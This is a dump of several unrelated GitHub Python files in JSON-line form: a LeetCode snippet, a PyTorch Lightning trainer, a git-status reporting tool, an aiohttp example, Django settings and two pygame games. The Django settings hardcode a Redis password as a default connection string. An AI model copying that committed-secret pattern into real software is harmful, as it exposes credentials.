letterDict[char]\n\n \n return ans\n\n\nprint(isIsomorphicString('foo', 'bar'))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/isIsomorphicString.py","file_name":"isIsomorphicString.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34839019838","text":"import argparse\r\nimport os\r\nimport yaml\r\nimport json\r\n\r\nimport pytorch_lightning as pl\r\n\r\nfrom pytorch_lightning.loggers import CSVLogger\r\nfrom pytorch_lightning.utilities.seed import seed_everything\r\nfrom pytorch_lightning.plugins import DDPPlugin\r\nfrom utils.general_utils import *\r\n\r\n\r\nfrom datasets import DInterface\r\nfrom models import MInterface\r\n\r\n\r\ndef main(args):\r\n seed_everything(args.seed, workers=True)\r\n\r\n exp_name = args.config.split(\"/\")[-1].replace(\".yaml\", \"\").upper()\r\n\r\n split_file = args.split_file\r\n with open(split_file, \"r\") as f:\r\n split_data = json.load(f)\r\n logger = CSVLogger(save_dir=\"results\", name=\"\", version=exp_name)\r\n args.save_dir = logger.log_dir\r\n\r\n for split in split_data:\r\n data_module = DInterface(args, split)\r\n if args.resume:\r\n model = MInterface.load_from_checkpoint(\r\n checkpoint_path=args.resume, args=args, strict=False\r\n )\r\n else:\r\n model = MInterface(args)\r\n\r\n trainer = pl.Trainer(\r\n gpus=-1,\r\n max_epochs=args.max_epochs,\r\n checkpoint_callback=False,\r\n check_val_every_n_epoch=args.val_freq,\r\n logger=logger,\r\n accelerator=\"ddp_spawn\",\r\n plugins=DDPPlugin(find_unused_parameters=False),\r\n num_sanity_val_steps=args.num_sanity_val_steps,\r\n deterministic=True,\r\n )\r\n trainer.fit(model, data_module)\r\n\r\n old = os.path.join(\"results\", exp_name, \"metrics.csv\")\r\n new = old.replace(\"metrics\", \"metrics_final\")\r\n rename(old, new)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--config\", default=\"\")\r\n args = parser.parse_args()\r\n with open(args.config) as f:\r\n config = yaml.load(f, Loader=yaml.FullLoader)\r\n for k, v in config.items():\r\n setattr(args, k, v)\r\n main(args)\r\n","repo_name":"HopLee6/SSPVS-PyTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"12605604895","text":"import pathlib\nimport sys\nimport subprocess\nimport rich.console\nimport rich.table\n\n\nclass CommandLine(object):\n # 搜索目录\n dir = pathlib.Path(__file__).parent\n # 搜索层级\n search_level = 2\n\n\ndef print_help():\n print(f'''根据指定目录和指定搜索深度,查找纳入版本管理系统的项目,并列出项目状态\n\n{sys.argv[0]}\n 搜索当前目录,搜索深度为2\n\n{sys.argv[0]} search_path\n 搜索search_path目录,搜索深度为2\n\n{sys.argv[0]} search_path search_level\n 搜索search_path目录,搜索深度为search_level''')\n pass\n\n\ndef print_version():\n print(\"v 1.0.0\")\n\n\ndef init_command_line():\n if len(sys.argv) == 2:\n if sys.argv[1] == \"--help\" or sys.argv[1] == \"-h\":\n print_help()\n return False\n elif sys.argv[1] == \"--version\" or sys.argv[1] == \"-v\":\n print_version()\n return False\n else:\n CommandLine.dir = pathlib.Path(sys.argv[1])\n elif len(sys.argv) == 3:\n CommandLine.dir = pathlib.Path(sys.argv[1])\n try:\n CommandLine.search_level = int(sys.argv[2])\n except ValueError:\n print_help()\n return False\n path = pathlib.Path(CommandLine.dir)\n if not path.is_dir() and not path.is_file():\n print_help()\n return False\n if path.is_file():\n path = path.parent\n CommandLine.dir = path.resolve()\n return True\n\n\nclass ProjectInfo(object):\n def __init__(self):\n # 项目名称\n self.project = \"\"\n # 版本库类型,git或svn\n self.cvs_type = \"\"\n # 分支名称\n self.branch_name = \"\"\n # 可能的值包含\n # done:所有修改都已提交并push到服务器\n # modified:已修改未commit\n # committed:已commit未push\n self.status = \"\"\n # 更改的文件的数量\n self.modified_count = 0\n # 未纳入版本管理的文件数量\n self.untracked_count = 0\n # 删除的文件的数量\n self.deleted_count = 0\n # 新文件的数量\n self.new_count = 0\n\n\nclass PathInfo(object):\n def __init__(self, path, cvs_type):\n self.path = path\n self.cvs_type = cvs_type\n\n\nclass Branch(object):\n def process(self, path: str) -> ProjectInfo:\n pass\n\n @staticmethod\n def run_command(cmd: str, path: str):\n p = subprocess.Popen(cmd, cwd=path, stdout=subprocess.PIPE)\n return p.stdout.readlines()\n pass\n\n\nclass GitBranch(Branch):\n def process(self, path: str) -> ProjectInfo:\n project_info = ProjectInfo()\n project_info.project = pathlib.Path(path).name\n project_info.cvs_type = \"git\"\n out_list = self.run_command(\"git status\", path)\n untracked_files_start = False\n for out in out_list:\n line = out.decode(\"utf8\").strip(\"*\").strip(\"\\n\").strip(\"\\r\")\n if line == \"\":\n continue\n if line[0].isspace():\n line = line.strip()\n if line.startswith(\"(\"):\n if line.find(\"git push\") > 0 and line.find(\"publish your local commits\") > 0:\n project_info.status = \"committed\"\n continue\n if untracked_files_start:\n project_info.untracked_count += 1\n elif line.startswith(\"modified:\"):\n project_info.modified_count += 1\n elif line.startswith(\"deleted:\"):\n project_info.deleted_count += 1\n elif line.startswith(\"new file:\"):\n project_info.new_count += 1\n else:\n untracked_files_start = False\n if line.startswith(\"(\"):\n continue\n elif line.startswith(\"On branch\"):\n project_info.branch_name = line.split()[-1]\n elif line.startswith(\"nothing to commit\"):\n if project_info.status == \"\":\n project_info.status = \"done\"\n elif line.startswith(\"Untracked files:\"):\n untracked_files_start = True\n if project_info.status != \"committed\" and project_info.status != \"done\":\n project_info.status = \"modified\"\n return project_info\n pass\n\n\nclass BranchManager(object):\n def __init__(self):\n self.supported_cvs_type = {\n \".git\": \"git\",\n \".svn\": \"svn\"\n }\n self.create_branch_helper = {\n \"git\": lambda: GitBranch()\n }\n self.modified_color = \"red\"\n self.current_level = 0\n pass\n\n def work(self):\n path_list = self.__collect_path()\n project_info_list = []\n for item in path_list:\n if item.cvs_type not in self.create_branch_helper:\n continue\n branch = self.create_branch_helper[item.cvs_type]()\n project_info = branch.process(item.path)\n project_info_list.append(project_info)\n self.__print_project_info(project_info_list)\n pass\n\n def __collect_path(self):\n path_list = []\n self.current_level = 1\n self.__do_collect_path(pathlib.Path(CommandLine.dir), path_list)\n return path_list\n pass\n\n def __do_collect_path(self, path: pathlib.Path, path_list: list):\n if self.current_level > CommandLine.search_level:\n return\n for p in path.glob(\"*\"):\n if p.is_file():\n continue\n if p.name in self.supported_cvs_type.keys():\n cvs_type = self.supported_cvs_type[p.name]\n path_list.append(PathInfo(path, cvs_type))\n else:\n self.current_level += 1\n self.__do_collect_path(path.joinpath(p), path_list)\n self.current_level -= 1\n pass\n\n def __print_project_info(self, project_info_list):\n console = rich.console.Console()\n console.print(\"branch info\")\n table = rich.table.Table(show_header=True, header_style=\"bold magenta\")\n table.add_column(\"project\")\n table.add_column(\"branch\")\n table.add_column(\"status\")\n for project_info in project_info_list:\n if project_info.status == \"done\":\n table.add_row(project_info.project, project_info.branch_name, project_info.status)\n else:\n table.add_row(f\"[{self.modified_color}]{project_info.project}[/{self.modified_color}]\",\n f\"[{self.modified_color}]{project_info.branch_name}[/{self.modified_color}]\",\n f\"[{self.modified_color}]{project_info.status}[/{self.modified_color}]\")\n console.print(table)\n\n console.print(\"modified info\")\n table = rich.table.Table(show_header=True, header_style=\"bold magenta\")\n table.add_column(\"project\")\n table.add_column(\"modified\")\n table.add_column(\"untracked\")\n table.add_column(\"deleted\")\n table.add_column(\"new\")\n for project_info in project_info_list:\n table.add_row(project_info.project,\n str(project_info.modified_count), str(project_info.untracked_count),\n str(project_info.deleted_count), str(project_info.new_count))\n console.print(table)\n pass\n\n\ndef main():\n if not init_command_line():\n return\n mgr = BranchManager()\n mgr.work()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xstar2091/pytools","sub_path":"src/branch.py","file_name":"branch.py","file_ext":"py","file_size_in_byte":7542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1788722205","text":"# Async CPU workload\nimport asyncio\nimport aiohttp\n\nfrom ch8_asyncronous_io.batched_results import do_task\n\n\ndef save_result_aiohttp(client_session):\n sem = asyncio.Semaphore(100)\n\n async def saver(result):\n nonlocal sem, client_session\n url = f\"http://127.0.0.1:8080/add\"\n async with sem:\n async with client_session.post(url, data=result) as response:\n return await response.json()\n return saver\n\n\nasync def calculate_task_aiohttp(num_iter, task_difficulty):\n tasks = []\n async with aiohttp.ClientSession() as client_session:\n saver = save_result_aiohttp(client_session)\n for i in range(num_iter):\n result = do_task(i, task_difficulty)\n task = asyncio.create_task(saver(result))\n tasks.append(task)\n await asyncio.sleep(0)\n await asyncio.wait(tasks)\n","repo_name":"AlexandruScrob/high_performance","sub_path":"ch8_asyncronous_io/async_cpu_workload.py","file_name":"async_cpu_workload.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16413601217","text":"import os\nfrom urllib.parse import urlparse\n\nimport environ\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nenv = environ.Env(\n # set casting, default value\n DEBUG=(bool, False)\n)\n\nPROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nBASE_DIR = os.path.dirname(PROJECT_DIR)\n\nSIMPEL_PAGE_MODEL = \"simpel_pages.Page\"\nSIMPEL_PAGE_SITE_MODEL = \"simpel_pages.RootPage\"\n\nSITE_ID = 1\n\nSITE_NAME = env(\"SITE_NAME\", str, default=\"example\")\n\nBASE_URL = env(\"BASE_URL\", str, default=\"http://127.0.0.1:8000\")\n\nPAGE_CACHE_TIMEOUT = env(\"PAGE_CACHE_TIMEOUT\", int, default=0)\n\nINSTALLED_APPS = [\n \"haystack\",\n \"apps.auth\",\n \"simpel_pages\",\n \"simpel_themes\",\n \"simpel_settings\",\n \"mptt\",\n \"filer\",\n \"tinymce\",\n \"django_rq\",\n \"polymorphic\",\n \"easy_thumbnails\",\n \"django.contrib.admin\",\n \"django.contrib.admindocs\",\n \"django.contrib.sites\",\n \"django.contrib.sitemaps\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n]\n\nMIDDLEWARE = [\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n]\n\n\nROOT_URLCONF = \"server.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\n os.path.join(PROJECT_DIR, \"templates\"),\n ],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"apps.auth.contexts.settings_export\",\n ],\n },\n },\n]\n\n\nWSGI_APPLICATION = \"server.wsgi.application\"\n\nCOMMENTS_APP = \"django_comments_xtd\"\nCOMMENTS_XTD_MODEL = \"simpel_discuss.models.Threat\"\nCOMMENTS_XTD_FORM_CLASS = \"simpel_discuss.forms.ThreatForm\"\n# To help obfuscating comments before they are sent for confirmation.\nCOMMENTS_XTD_SALT = b\"Timendi causa est nescire. \" b\"Aequam memento rebus in arduis servare mentem.\"\n\n# Source mail address used for notifications.\nCOMMENTS_XTD_FROM_EMAIL = \"webmaster@example.com\"\nCOMMENTS_XTD_MAX_THREAD_LEVEL = 1 # default is 0\nCOMMENTS_XTD_LIST_ORDER = (\"-thread_id\", \"order\") # default is ('thread_id', 'order')\n\n# Contact mail address to show in messages.\nCOMMENTS_XTD_CONTACT_EMAIL = \"helpdesk@example.com\"\n\nCOMMENTS_XTD_APP_MODEL_OPTIONS = {\n \"default\": {\n \"allow_flagging\": True,\n \"allow_feedback\": True,\n \"show_feedback\": True,\n \"who_can_post\": \"users\", # Valid values: 'all', users'\n }\n}\n\n# ------------------------------------------------------------------------------\n# DATABASE\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n# ------------------------------------------------------------------------------\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n }\n}\n\n\n# ------------------------------------------------------------------------------\n# PASSWORD VALIDATION\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n# ------------------------------------------------------------------------------\n\nAUTH_USER_MODEL = \"authentication.User\"\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n\n######################################################\n# SESSION & CACHE\n######################################################\n\nREDIS_URL = env(\"REDIS_URL\", str, \"redis://:habibie099secret@127.0.0.1:6379/0\")\n\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nSESSION_COOKIE_AGE = 60 * 15 # Logout if inactive for 15 minutes\nSESSION_SAVE_EVERY_REQUEST = True\n\nif REDIS_URL:\n SESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n SESSION_CACHE_ALIAS = \"default\"\n CACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_URL,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n }\n######################################################\n# QUEUES\n######################################################\n\nREDIS_SSL = env(\"REDIS_SSL\", bool, False)\nRQ_DATABASE = 1\nRQ_URL = urlparse(REDIS_URL)\n\nRQ_QUEUES = {\n \"default\": {\n \"HOST\": RQ_URL.hostname,\n \"USERNAME\": RQ_URL.username,\n \"PASSWORD\": RQ_URL.password,\n \"PORT\": RQ_URL.port,\n \"DB\": RQ_DATABASE,\n \"SSL\": bool(REDIS_SSL),\n \"SSL_CERT_REQS\": None,\n },\n}\n\n# -----------------------------------------------------------------\n# INTERNATIONALIZATION\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n# -----------------------------------------------------------------\n\nTIME_ZONE = \"UTC\"\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLANGUAGE_CODE = \"en\"\nLANGUAGES = [\n (\"id\", \"Indonesia\"),\n (\"en\", \"English (United States)\"),\n]\n\n# -----------------------------------------------------------------\n# STATICFILE & STORAGE\n# -----------------------------------------------------------------\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n]\n\nSTATICFILES_DIRS = [os.path.join(PROJECT_DIR, \"static\")]\nSTATICFILES_STORAGE = \"django.contrib.staticfiles.storage.ManifestStaticFilesStorage\"\n\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = os.path.join(BASE_DIR, \"mediafiles\")\nMEDIA_URL = \"/media/\"\n\n# -----------------------------------------------------------------\n# CACHE\n# -----------------------------------------------------------------\n\nREDIS_URL = env(\"REDIS_URL\", str, default=None)\nSESSION_ENGINE = \"django.contrib.sessions.backends.db\"\n\nif REDIS_URL:\n SESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\n SESSION_CACHE_ALIAS = \"default\"\n CACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_URL,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n },\n }\n\n\n# SENTRY\n\nSENTRY_DSN = env(\"SENTRY_DSN\", str, default=\"\")\n\nif SENTRY_DSN:\n sentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=[DjangoIntegration()],\n # Set traces_sample_rate to 1.0 to capture 100%\n # of transactions for performance monitoring.\n # We recommend adjusting this value in production.\n traces_sample_rate=1.0,\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True,\n )\n\nFAVICON_URL = \"/favicon.ico\"\n\nSETTINGS_EXPORT = [\n \"PAGE_CACHE_TIMEOUT\",\n \"BASE_URL\",\n \"SITE_NAME\",\n \"FAVICON_URL\",\n]\n\nSETTINGS_EXPORT_VARIABLE_NAME = \"django_settings\"\n\nTAGGIT_CASE_INSENSITIVE = True\n\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\nTINYMCE_DEFAULT_CONFIG = {\n \"theme\": \"silver\",\n \"height\": 300,\n \"menubar\": False,\n \"plugins\": \"advlist, autolink, lists, link, image, charmap, print, preview, anchor, table,\"\n \"searchreplace, visualblocks, code, fullscreen, insertdatetime , media, table, paste,\"\n \"code, help, wordcount\",\n \"toolbar\": \"undo redo | formatselect | \"\n \"bold italic backcolor | alignleft aligncenter \"\n \"alignright alignjustify | bullist numlist indent table image| \"\n \"removeformat code help\",\n}\n\nHAYSTACK_CONNECTIONS = {\n \"default\": {\n \"ENGINE\": \"haystack.backends.whoosh_backend.WhooshEngine\",\n \"PATH\": os.path.join(BASE_DIR, \"search\"),\n \"STORAGE\": \"file\",\n \"POST_LIMIT\": 128 * 1024 * 1024,\n \"INCLUDE_SPELLING\": True,\n \"BATCH_SIZE\": 100,\n # 'EXCLUDED_INDEXES': ['thirdpartyapp.search_indexes.BarIndex'],\n },\n}\n\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n },\n },\n \"root\": {\n \"handlers\": [\"console\"],\n \"level\": \"WARNING\",\n },\n \"django.request\": {\"handlers\": [\"console\"], \"level\": \"ERROR\", \"propagate\": True},\n}\n","repo_name":"justsasri/simpel-pages-heroku","sub_path":"server/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3688039740","text":"\"\"\"\nimport pygame\nimport random\nimport numpy as np\nimport math\n\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\nyellow = (255, 255, 0)\ncyan = (0, 255, 255)\nmagenta = (255, 0, 255)\n\nradius = 5\n\nred_particles = []\n\ncyan_particles = []\n\"\"\"\n\"\"\"\n# importing the required libraries\nimport pygame\nfrom pygame.locals import *\nimport random\nimport math\n\nclass Particle:\n def __init__(self, running, width, height, color):\n # initialising pygame\n pygame.init()\n self.width = width\n self.height = height\n self.screen = pygame.display.set_mode((self.width, self.height))\n\n pygame.display.set_caption(\"Particle Life\") # setting title\n self.screen.fill(color)\n\n pygame.display.update()\n self.running = running\n\n # initialising clock\n self.clock = pygame.time.Clock()\n\n # colors\n self.blue = (0, 0, 255)\n self.red = (255, 0, 0)\n self.green = (0, 255, 0)\n self.yellow = (255, 255, 0)\n\n # function to create\n # one particle on the scree\n\n def createParticle(self, x, y, color):\n pygame.draw.rect(self.screen, color, (x, y, 2, 2))\n\n # returns a dict\n\n def returnParticle(self, x, y, color, vx, vy):\n return {\"x\": x, \"y\": y, \"color\": color, \"vx\": vx, \"vy\": vy}\n\n # returns a list consisting\n # of all the necessary things\n\n def manyParticles(self, number, color):\n group = []\n for i in range(number):\n x = random.randint(1, self.width-1)\n y = random.randint(1, self.height-1)\n vx = 0\n vy = 0\n\n group.append(self.returnParticle(x, y, color, vx, vy))\n return group\n\n # the function to create\n # many particles\n\n def createParticles(self, particles):\n for particle in particles:\n self.createParticle(\n particle[\"x\"], particle[\"y\"], particle[\"color\"])\n\n # this is the mainrule function\n # which follows F = GMm/r^2\n # and this will move the particles towards each other\n # and also coordinate geometry = squareroot[(x2-x1)^2 + (y2-y1)^2]\n # and also F = ma\n\n def mainRule(self, particles1, particles2, g):\n # first iterating over all the particles in the particles1\n for i in range(len(particles1)):\n # setting the force to be applied\n # in the x and y coordinates\n fx = 0\n fy = 0\n\n # now iterating over the particles2\n for j in range(len(particles2)):\n a = particles1[i]\n b = particles2[j]\n dx = a[\"x\"]-b[\"x\"]\n dy = a[\"y\"]-b[\"y\"]\n # using coordinate geometry to find the distance between two particles\n d = math.sqrt(dx*dx+dy*dy)\n if (d > 0):\n F = g*1/d\n fx += (F*dx)\n fy += (F*dy)\n\n a[\"vx\"] = (a[\"vx\"] + fx)*0.5\n a[\"vy\"] = (a[\"vy\"] + fy)*0.5\n # due to the forc applied\n # the particles also face acceleration\n # so setting the velocity using the force formula\n a[\"x\"] += a[\"vx\"]\n a[\"y\"] += a[\"vy\"]\n\n # now reversing the particles\n # when they hit the wall\n if (a[\"x\"] <= 0 or a[\"x\"] >= 700):\n a[\"vx\"] *= -1\n elif (a[\"y\"] <= 0 or a[\"y\"] >= 500):\n a[\"vy\"] *= -1\n self.screen.fill(0)\n\n # the main loop\n\n def gameLoop(self):\n # defining particles\n self.yellowParticles = self.manyParticles(200, self.yellow)\n self.redParticles = self.manyParticles(200, self.red)\n self.greenParticles = self.manyParticles(200, self.green)\n self.blueParticles = self.manyParticles(200, self.blue)\n\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n # creating the particles\n self.createParticles(self.yellowParticles)\n self.createParticles(self.redParticles)\n self.createParticles(self.greenParticles)\n self.createParticles(self.blueParticles)\n\n # updating the display\n pygame.display.update()\n\n # enter your rules here\n # defining the rules\n self.mainRule(self.yellowParticles, self.yellowParticles, -0.1)\n\n self.clock.tick(78)\n pygame.quit()\n\n# the main function\n\n\ndef main():\n particleLife = Particle(True, 700, 500, (0, 0, 0))\n particleLife.gameLoop()\n\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n## A simple Python port - You need: pip install pygame. Note the code here is not efficient but it's made to be educational and easy\nimport pygame\nimport random\nimport math\n\natoms=[]\nwindow_size = 300\npygame.init()\nwindow = pygame.display.set_mode((1920, 1080))\n#deltaTime = pygame.time.get_ticks()\n\n\ndef draw(surface, x, y, color, radius):\n for i in range(0, radius):\n pygame.draw.circle(surface, color, (x, y), radius)\n \ndef atom(x, y, c):\n return {\"x\": x, \"y\": y, \"vx\": 0, \"vy\": 0, \"color\": c}\n\ndef randomxy():\n return round(random.random()*1920 + 1)\n\ndef create(number, color):\n group = []\n for i in range(number):\n group.append(atom(randomxy(), randomxy(), color))\n atoms.append((group[i])) #all particles\n return group\n\n\ndef rule(atoms1, atoms2, g):\n for i in range(len(atoms1)):\n fx = 0\n fy = 0\n for j in range(len(atoms2)):\n a = atoms1[i]\n b = atoms2[j]\n dx = a[\"x\"] - b[\"x\"]\n dy = a[\"y\"] - b[\"y\"]\n d = (dx*dx + dy*dy)**0.5\n if( d > 0 and d < 80):\n F = g/d\n fx += F*dx\n fy += F*dy\n a[\"vx\"] = (a[\"vx\"] + fx)*0.5\n a[\"vy\"] = (a[\"vy\"] + fy)*0.5\n a[\"x\"] += a[\"vx\"]\n a[\"y\"] += a[\"vy\"]\n if(a[\"x\"] <= 0 or a[\"x\"] >= 1920):\n a[\"vx\"] *=-1\n if(a[\"y\"] <= 0 or a[\"y\"] >= 1080):\n a[\"vy\"] *=-1 \n\n\n\"\"\" def rule2(atoms1, atoms2):\n for i in range(len(atoms1)):\n for j in range(len(atoms2)):\n pA = atoms1[i]\n pB = atoms2[j]\n dx = pA[\"x\"] - pB[\"x\"]\n dy = pA[\"y\"] - pB[\"y\"]\n r = math.sqrt(dx**2 + dy**2)\n if r < 20:\n t = pygame.time.get_ticks() - deltaTime\n pA[\"x\"] += math.sin(t) + 5\n pA[\"y\"] += math.sin(t) + 5\n elif r > 20:\n pass \"\"\"\n\n\n\ncyan = create(200, \"cyan\")\nmagenta = create(200, \"magenta\")\n#white = create(200, \"white\")\n\n\nrun = True\nwhile run:\n window.fill(0)\n rule(magenta, magenta, 14)\n rule(magenta, cyan, -15)\n rule(cyan, cyan, -200)\n for i in range(len(atoms)):\n draw(window, atoms[i][\"x\"], atoms[i][\"y\"], atoms[i][\"color\"], 2)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.display.flip()\npygame.quit()\nexit()\n","repo_name":"MattMattL/HackNotts-23","sub_path":"particles/fairuz_particle copy.py","file_name":"fairuz_particle copy.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3634732015","text":"# TEE PELI TÄHÄN\n\n \n\n \n\n'''\n\nRIKKAAKSI KUOLEMAN UHALLA\n\n \n\nPelissä kerätään rahaa ja väistellään hirviöitä. \n\n \n\nRobottia liikutellaan vasemmalle ja oikealle nuolinäppääimillä.\n\n \n\nPeli voitetaan jos saadaan kerättyä 5 rahaa ja hävitään jos osutaan monsteriin.\n\n \n\nPelin vaikeutta voit lisätä\n\n- lisäämällä nopeutta (oletus 2.5)\n\n- lisäämällä monstereita (oletus keskimäärin 1 monsteri / 80 tapahtumaa)\n\n- vähentämällä rahoja (oletus keskimäärin 1 raha / 120 tapahtumaa)\n\n'''\n\n \n\n########################################################################\n\n# vaikeuden säätäminen\n\n'''säädä halutessasi peliä vaikeammaksi alla-olevien ohjeiden mukaan'''\n\n \n\n# mitä nopeampi, sitä vaikeampi. esim. 3 on jo aika nopea\n\nnopeus=2.5\n\n# pitä pienempi luku, sitä enemmän monstereita. Esim. 50 on jo monta robottia\n\nmonsterimaara=80\n\n# mitä suurempi luku, sitä vähemmän rahaa. Esim. 160 on suhteellisen harvakseltaan\n\nrahamaara=120\n\n \n\n########################################################################3\n\n#Paketit ja polut\n\n \n\n#haetaan paketteja\n\nimport random\n\nimport pygame\n\nimport os\n\n \n\n#tämä varmistaa, että working directory on sama kuin missä tämä file on\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n \n\n \n\n###########################################################################33\n\n# alustetaan peli, näyttö ja hahmot\n\n \n\npygame.init()\n\nw_d, h_d = 640, 480\n\nnaytto = pygame.display.set_mode((w_d, h_d))\n\n \n\n##robotin alustus\n\nrobo = pygame.image.load(\"robo.png\") \n\nh_r=robo.get_height()\n\nw_r=robo.get_width()\n\nx_r = w_d/2-w_r\n\ny_r = h_d-h_r\n\n \n\n##monsterin alustus\n\nmonsterX = pygame.image.load(\"hirvio.png\") \n\nh_m=monsterX.get_height() \n\nw_m=monsterX.get_width() \n\n \n\n##rahan alustus (kivi=raha)\n\nkivi = pygame.image.load('kolikko.png') \n\nh_k=kivi.get_height()\n\nw_k=kivi.get_width()\n\n \n\n \n\n##################################################################\n\n## luodaan apuluokkia ja funktioita yksittäisille objekteille\n\n \n\n# luokka on sama rahalle, monsterille (ja aiemmin kivelle)\n\nclass Kivi:\n\n def __init__(self):\n\n self.x=random.randint(0,w_d-w_k)\n\n self.y=-h_k\n\n self.x_suunta=0\n\n self.y_suunta=1\n\n self.onko_ollut_pohjalla=False\n\n \n\n def __repr__(self):\n\n return f'x {self.x} y {self.y} x_suunta {self.x_suunta} y_suunta {self.y_suunta} pohjalla {self.onko_ollut_pohjalla}'\n\n \n\n# funktio joka liikuttaa alas taivaalta tippuvaa objektia\n\ndef move_kivi(ME:Kivi):\n\n ME.y += ME.y_suunta\n\n ME.x += ME.x_suunta\n\n if ME.y-h_k >= h_d:\n\n if ME.onko_ollut_pohjalla==False:\n\n ME.onko_ollut_pohjalla=True\n\n \n\n# näytetään kivi (raha)\n\ndef display_kivi(ME:Kivi):\n\n naytto.blit(kivi, (ME.x, ME.y))\n\n \n\n# näytetään monsteri\n\ndef display_monsteri(ME:Kivi):\n\n naytto.blit(monsterX, (ME.x, ME.y)) \n\n \n\n##################################################################\n\n# alustetaan ohjelma\n\ngame_over=False\n\nvictory=False\n\nkivi_list=[]\n\nmonsteri_list=[]\n\noikealle = False\n\nvasemmalle = False\n\npisteet=0\n\nkello = pygame.time.Clock()\n\n \n\n# laitetaan ohjelma käyntiin\n\nwhile True:\n\n for tapahtuma in pygame.event.get():\n\n if tapahtuma.type == pygame.KEYDOWN:\n\n if tapahtuma.key == pygame.K_LEFT:\n\n vasemmalle = True\n\n if tapahtuma.key == pygame.K_RIGHT:\n\n oikealle = True\n\n \n\n if tapahtuma.type == pygame.KEYUP:\n\n if tapahtuma.key == pygame.K_LEFT:\n\n vasemmalle = False\n\n if tapahtuma.key == pygame.K_RIGHT:\n\n oikealle = False\n\n \n\n if tapahtuma.type == pygame.QUIT:\n\n exit()\n\n \n\n #siirretään robottia oikealle tai vasemmalle riippuen siitä onko nuolinäppäin pohjassa\n\n if oikealle:\n\n if x_r0:\n\n x_r -= 3\n\n \n\n # # arvotaan joka hetki tuleeko uusi raha\n\n if random.randint(0,rahamaara)==1:\n\n kivi_list.append(Kivi())\n\n \n\n #arvotaan joka hetki, tuleeeko uusi monsteri\n\n if random.randint(0,monsterimaara)==2:\n\n monsteri_list.append(Kivi())\n\n \n\n # poistetaan ne taivaankappaleet, jotka tippuneet ohi maanpinnan\n\n kivi_list = [x for x in 